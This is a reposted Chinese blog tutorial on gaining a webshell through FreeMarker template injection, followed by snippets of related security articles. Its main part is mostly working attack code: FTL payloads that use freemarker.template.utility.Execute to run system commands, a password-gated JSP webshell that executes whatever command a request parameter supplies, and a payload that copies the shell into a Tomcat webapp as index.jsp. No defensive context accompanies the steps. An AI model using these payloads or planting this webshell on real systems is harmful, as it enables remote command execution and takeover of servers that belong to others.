FreeMarker执行系统命令

最新推荐文章于 2024-08-25 23:26:52 发布
转载 最新推荐文章于 2024-08-25 23:26:52 发布 · 875 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/519369
文章标签:

#shell #runtime #java

本文介绍了一种通过Freemarker模板语言(FTL)的漏洞来上传恶意模板文件并最终获取WebShell的方法。步骤包括寻找上传点、注入FTL模板、定位文件路径、部署并激活WebShell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、寻找可以上传FTL模板的漏洞点


2、尝试注入FTL模板

1
2
<#assign test="freemarker.template.utility.Execute"?new()>
${test("id")}


3、查找上传的FTL文件保存路径

1
2
<#assign test="freemarker.template.utility.Execute"?new()>
${test("find / -name *.ftl")}


4、获取WebShell

1
2
3
4
# webshell.ftl
<%if ("023".equals(request.getParameter("pwd")))
{java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1; byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}}%>
1
2
3
4
# main.ftl
<#assign test="freemarker.template.utility.Execute"?new()>
${test("cp /home/bmpapp/upc_plugin_home/export_plugin/development/user/webshell.ftl 
/home/bmpapp/tomcat/webapps/default.war/index.jsp")}


5、访问index.jsp


















本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1936931 ,如需转载请自行联系原作者




Java安全之freemaker模版注入
AS011x的博客
09-19 1963
FreeMarker 是一款模板引擎: 即一种基于模板和要改变的数据, 并用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)的通用工具。在线手册:什么是 FreeMarker?- FreeMarker 中文官方参考手册模板文件存放在Web服务器上,当访问指定模版文件时, FreeMarker会动态转换模板,用最新的数据内容替换模板中${...}的部分,然后返回渲染结果。${...}: FreeMarker将会输出真实的值来替换大括号内的表达式,这样的表达式被称为(插值)
从ofcms的模板注入漏洞(CVE-2019-9614)浅析SSTI漏洞
Alexz__的博客
05-04 2239
什么是SSTI漏洞 CVE-2019-9614漏洞复现 ofcms的freemarker模板源码简要分析 壹 什么是SSTI漏洞 SSTI:Server Side Template Injection 服务器端模板注入漏洞 既然是注入漏洞,那么它所运用的核心思想就和XSSSQL注入差不多,都是运用不安全的用户输入,将正常的数据接收处进行恶意输入,导致服务器将用户输入数据当成代码并执行,从而完成一些危险的行为 我们针对SSTI来看,他的主要载体是web站点MVC架构之上,也就是从...
freemarker指令(九)
一叶知春秋
12-24 5769
Freemarker指令 如果你没有在这里发现模板中的指令,可能你需要在废弃的 FTL 结构中来查找它了。 2.1 if ,else ,elseif  指令 2.1.1  概要 ... ... ... ... ... 这里:   condition , condition2 等:表达式将被计算成布尔值。 2.1.2  描述 你可以使用 if , els
SpringBoot+FreeMarker 学习(三)FreeMarker基本指令
dengdaijc的专栏
10-13 1072
介绍FreeMarker的三个基本指令的使用,分别为if,list,include
freeMarker(十一)——模板语言之指令
weixin_30799995的博客
01-18 1041
学习笔记,选自freeMarker中文文档,译自 Email: ddekany at users.sourceforge.net 1.assign 概要 <#assign name1=value1 name2=value2 ... nameN=valueN> 或 <#assign same as above... in namespacehash> 或 &...
freemarker模版注入
最新发布
l_l_c_q的博客
08-25 1920
freemarker模版注入
java代码审计.Freemarker模板命令注入.分析
10-21
该方法没有对存入模板的数据进行充足的过滤,攻击者可以将可执行系统命令的恶意代码存入 Freemarker 模板。然后,在渲染页面时,Freemarker 会执行恶意代码。 漏洞利用 要利用该漏洞,攻击者可以按照以下步骤操作...
FreeMarker
11-19
FreeMarker 支持自定义命令,通过 `macro` 可以定义新的模板命令,并且可以向这些命令传递参数。这有助于减少重复代码,并增强模板的复用性。 ### 总结 FreeMarker 是一款功能强大的模板引擎,能够帮助开发者高效...
OFCMS Freemarker模板命令注入漏洞深度分析
文档指出在系统中,由于对Freemarker模板数据的过滤不足,攻击者可能利用模板注入执行系统命令,获取WebShell。" 在Java代码审计中,Freemarker模板命令注入是一个严重的问题,尤其当系统未对用户提供的模板数据...
简单的(ssh2+freemarker)新闻、产品管理系统
08-28
SSH2(Secure Shell 2)是一种网络协议,用于安全地远程登录到服务器,进行数据传输和命令执行。它提供了加密的通信,确保了数据在传输过程中的安全性,防止被窃听或篡改。SSH2比SSH1更安全,因为它使用更强的加密...
springmvc,freemarker模式下脚本注入问题
zhangyongbink的博客
03-21 1004
后台: ContractChange change = contractChangeService.load(id); String[] contractJsonArray = change.getResult().split("#timelead#"); List detaillists = JacksonUtil.deserialize2list
freemarker语法_CVE20207799:FreeMarker模板FusionAuth RCE复现
weixin_39983384的博客
11-30 362
点击上方蓝色字体关注我们,一起学安全!本文作者:?(团队复现组成员)本文字数:718阅读时长:2~3min声明:请勿用作违法用途,否则后果自负0x01 简介FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。0x02 漏洞概述一个有修改 email...
freemarker的测试结果框架_总结下Java高级框架前半部分:
weixin_39649965的博客
11-26 149
SpringMVC:1.springMvc是spring组织出品的一个表现层框架, 和struts2属于同类型的框架.2. springMvc作用:a. 接收请求和从请求中接收参数 b. 将处理好的数据返回给页面, 并在页面展示3.springMvc三大组件: 处理器映射器, 处理器适配器, 视图解析器。 springMVC中需要我们写的有哪些: 处理器也就是我们写的controller, 视...
freemarker 使用数据字典_CVE-2020-7799:FreeMarker模板FusionAuth RCE复现
weixin_39781945的博客
11-19 380
0x01 简介FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。0x02 漏洞概述一个有修改 email 或者 theme 模板权限的用户可以通过使用 Apache FreeMarker engine 里的 freemarker.template.util...
Freemarker模板注入:CVE-2020-7477
守拙的博客
08-04 2576
一、漏洞名称: FusionAuth存在Freemarker模板注入导致远程命令执行 二、漏洞编号: CVE-2020-7477 三、漏洞描述: 在FusionAuth 1.11.0之前版本存在注入漏洞,经过身份验证的用户被允许编辑电子邮件模板或主题, 远程攻击者可利用该漏洞调用在系统上执行任意命令。 四、影响版本: FusionAuth <= 1.11.0 五、漏洞分析 通过对直接编辑freemarker模板,调用freemarker.template.utility.E
【SpringBoot 采坑记】- FreeMarker
Mr小墨的博客
06-11 1128
SprigBoot FreeMarker Email
java代码审计工具_Java代码审计汇总系列(六)——RCE
weixin_42315341的博客
02-16 1628
一、概述任意代码执行(Remote Code Execution)是危害最为严重的漏洞之一,挖掘难度也是相对高的,除了常见的文件上传漏洞,还有OS命令注入、表达式注入、模板注入、代码注入和第三方组件漏洞,下面依次讲解审计方法和技巧。二、分类挖掘技巧1、OS命令注入OS命令注入涉及执行系统命令,通过关键字定位执行命令的方法是否参数可控,常用的搜索关键字有:System|exec|passthru|...
Some vulnerabilities in JEECMSV9
测试
02-15 449
之前遇到了一个JEECMS大概看了一下, 测试版本JEECMSV9.3 SSRF/src/main/java/com/jeecms/cms/action/member/UeditorAct.java123456789101112131415161718192021@RequestMapping(value = "/ueditor/getRemoteImage.jspx")public void ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值